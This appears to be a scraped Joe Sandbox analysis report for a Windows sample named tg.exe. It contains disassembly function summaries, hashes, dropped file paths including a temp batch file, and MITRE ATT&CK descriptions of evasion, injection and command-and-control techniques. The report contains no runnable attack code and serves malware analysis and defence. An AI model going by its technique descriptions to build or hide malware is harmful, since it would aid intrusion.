Function 0040D6DD Relevance: 5.0, APIs: 4, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200), ref: 0040D6EF
HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF), ref: 0040D706
HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF), ref: 0040D722
LeaveCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040D9BE,00000000,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200), ref: 0040D73F

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: CriticalFreeHeapSection$EnterLeave
String ID:
API String ID: 1298188129-0
Opcode ID: 9025b1c5150b3b55cbdbde059a5d8489335d355e00ab4da0a2b3a5ee45c47fee
Instruction ID: 19831624efecdb95f34469d84cf285095463f1f7ead1137181efdd2e3cba2855
Opcode Fuzzy Hash: 9025b1c5150b3b55cbdbde059a5d8489335d355e00ab4da0a2b3a5ee45c47fee
Instruction Fuzzy Hash: CB012879A0161AAFC7208F96ED04967BB7CFB49751305853AA844A7A60C734E824DFE8

Function 00409ECF Relevance: 5.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040A11A: memset.MSVCRT ref: 0040A182

Part of subcall function 0040D946: EnterCriticalSection.KERNEL32(00418624,00000200,00000000,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3), ref: 0040D95A
Part of subcall function 0040D946: HeapFree.KERNEL32(00000000,?,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004), ref: 0040D9A8
Part of subcall function 0040D946: LeaveCriticalSection.KERNEL32(00418624,?,00409EE8,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D9AF

HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 00409EFA
HeapFree.KERNEL32(00000000,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F06
HeapFree.KERNEL32(00000000,?,?,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409F1A
HeapFree.KERNEL32(00000000,00000000,?,?,00409DEF,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409F30

Memory Dump Source

Source File: 00000000.00000002.4150198584.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4150182753.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150219093.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150236312.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4150252382.0000000000419000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_tg.jbxd

Similarity

API ID: FreeHeap$CriticalSection$EnterLeavememset
String ID:
API String ID: 4254243056-0
Opcode ID: 725e25c77e1e11b4bf87ed01b6ee150763b189248ade4676bad763f5516a4b52
Instruction ID: 731859a3b15cae5753bb7de1e8a6b13bc7caaa2a8ebc947d3a100cd7cc498ee7
Opcode Fuzzy Hash: 725e25c77e1e11b4bf87ed01b6ee150763b189248ade4676bad763f5516a4b52
Instruction Fuzzy Hash: ABF04471215109BFC6115F16DD40D57BF6DFF8A7A43424129B40493571CB36EC20AAA8

Analysis Process: powershell.exePID: 8176, Parent PID: 7556COMMON

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 00007FFD9BABB1C8 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

I, xrefs: 00007FFD9BABB33C

Memory Dump Source

Source File: 0000000D.00000002.1812708382.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9bab0000_powershell.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: 2c691d70208ebca606af0fdaf2bdada1a8e514b57c812e539cfd02dbd126b98e
Instruction ID: 4917a42669c403506b42c7e2597b60fcd055e1dee9b411718b60072c6f965ba8
Opcode Fuzzy Hash: 2c691d70208ebca606af0fdaf2bdada1a8e514b57c812e539cfd02dbd126b98e
Instruction Fuzzy Hash: 06617C72A0FADD4FEB25CB9858142BC7FA1FF55360F4402BBD098D71E7E924A9068781

Function 00007FFD9BABB2F8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE ref: 00007FFD9BABB9DE

Strings

I, xrefs: 00007FFD9BABB33C

Memory Dump Source

Source File: 0000000D.00000002.1812708382.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9bab0000_powershell.jbxd

Similarity

API ID: LibraryLoad
String ID: I
API String ID: 1029625771-3707901625
Opcode ID: a2ac584e70565f25bf4da6acaed45bfc1d745c8dca801d96fb9edd14786b357f
Instruction ID: 5f14a6236ccb8717734c20e25fef73c904799ea3d5483d7c5171304667f4defd
Opcode Fuzzy Hash: a2ac584e70565f25bf4da6acaed45bfc1d745c8dca801d96fb9edd14786b357f
Instruction Fuzzy Hash: E9412631A0DA5D8FDB59CB9C98456B9BBE0FF55320F04427FD059C72A2DB70A905CB81

Function 00007FFD9BABB934 Relevance: 1.6, APIs: 1, Instructions: 117
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE ref: 00007FFD9BABB9DE

Memory Dump Source

Source File: 0000000D.00000002.1812708382.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_7ffd9bab0000_powershell.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: bc666c07313c2e8e253e52091c9bbb01b5e0da3b75184c202a3fc6edac47c2e5
Instruction ID: 5d4c49b869cec89b2f41fa4ca871409f1543fbf64983098fe72492f26779da04
Opcode Fuzzy Hash: bc666c07313c2e8e253e52091c9bbb01b5e0da3b75184c202a3fc6edac47c2e5
Instruction Fuzzy Hash: D231E43190CB5C8FDB59DF989849BE9BBE0FF55320F04426BD019C3292DB74A805CB91

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report tg.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Initial Sample

Unpacked PEs

Sigma Signatures

System Summary

Language, Device and Operating System Detection

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\D272.tmp\D273.tmp\D274.bat

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3xbx0foa.ep5.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4ggphfjo.dmg.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bopvxlpi.ygr.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g21ldsmu.15n.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_guvfco2i.kyg.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i3sy33n3.wqb.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_imlafvh0.1l1.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mb2jaycx.cbw.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nbqxksni.pm1.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tex3cpej.e3y.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z1vuzy1k.33r.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zcezainx.mev.psm1

Static File Info

General

File Icon

Static PE Info

Windows Analysis Report
tg.exe

Function 0040A83A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 91
libraryloaderCOMMON